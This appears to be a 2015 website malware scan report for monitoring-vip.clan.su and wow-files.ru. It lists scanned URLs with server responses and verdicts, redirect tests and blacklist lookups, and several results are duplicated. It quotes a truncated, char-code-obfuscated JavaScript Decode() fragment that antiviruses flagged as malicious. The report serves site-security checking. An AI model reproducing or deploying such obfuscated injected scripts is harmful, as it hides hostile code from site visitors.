Scanned pages/files
Request | Server response | Status |
http://monitoring-vip.clan.su/ | 200 OK Content-Length: 31058 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!84!68!32!119!105!100!116!104!61!34!55!48!48!34!32!98!97!99!107!103!114!111!117!110!100!61!34!115!107!105!110!47!111!115!110!95!51!46!106!112!103!34!32!104!101!105!103!104!116!61!34!49!55!51!34!32!105!100!61!34!116!100!50!56!48!34!62!38!110!98!115!112!59!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!47!84!68!62!60!47!84!82!62!60!47!84!65!66!76!69!62!60!66!82!62!60!66 Antivirus reports:
| ||
http://wow-files.ru/sun_43171.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:48 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://wow-files.ru/index.html | 200 OK Content-Length: 66264 Content-Type: text/html | suspicious |
Suspicious code found <script type='text/javascript' language='javascript' src='includes/javascript/kr_dropdown.js'></script> <div class="showpic" id="showpic" style="display: none;"> <table class='showpics' cellpadding='0' cellspacing='0'> <tr> <td width='7'><img src='templates/wow/images/publisher_left_top.gif' width='7' height='7' alt='' /></td> <td class='publisher-top'><img src='templates/wow/images/pixel.gif' width='1' hei </div> <div class="cl"> </div> </div> <script language='javascript' type='text/javascript'> if(!thisStatusBlock){var thisStatusBlock = new Array();thisStatusBlock[thisStatusBlock.length] = 0;} else thisStatusBlock[thisStatusBlock.length] = 0;</script> | ||
http://wow-files.ru/includes/javascript/function.js | 200 OK Content-Length: 13415 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_showhints.js | 200 OK Content-Length: 1657 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_switchcontent.js | 200 OK Content-Length: 2747 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_validati.js | 200 OK Content-Length: 1921 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/kr_ajax.js | 200 OK Content-Length: 28341 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/jsconfig.js | 200 OK Content-Length: 129 Content-Type: application/x-javascript | clean |
http://wow-files.ru/includes/javascript/highslide.js | 200 OK Content-Length: 40435 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/js/jquery.js | 200 OK Content-Length: 72326 Content-Type: application/x-javascript | clean |
http://wow-files.ru/templates/wow/js/mw_hint.js | 200 OK Content-Length: 1064 Content-Type: application/x-javascript | clean |
http://wow-files.ru//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:49 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Vary: Accept-Encoding Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://wow-files.ru/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 04 Aug 2015 18:37:49 GMT Accept-Ranges: bytes ETag: "a62-50e30a7dd378e" Server: nginx/1.9.2 Content-Length: 2658 Content-Type: text/html Last-Modified: Tue, 03 Feb 2015 15:23:41 GMT | clean |
http://s45.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s45.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s45.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Aug 2015 18:37:44 GMT
Server: uServ/3.2.2
Content-Length: 31058
Content-Type: text/html; charset=UTF-8
...31058 bytes of data.
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Aug 2015 18:37:44 GMT
Server: uServ/3.2.2
Content-Length: 31058
Content-Type: text/html; charset=UTF-8
...31058 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Referer: http://www.google.com/search?q=monitoring-vip.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: monitoring-vip.clan.su
Referer: http://www.google.com/search?q=monitoring-vip.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=monitoring-vip.clan.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://monitoring-vip.clan.su/
Result: monitoring-vip.clan.su is not infected or malware details are not published yet.
Result: monitoring-vip.clan.su is not infected or malware details are not published yet.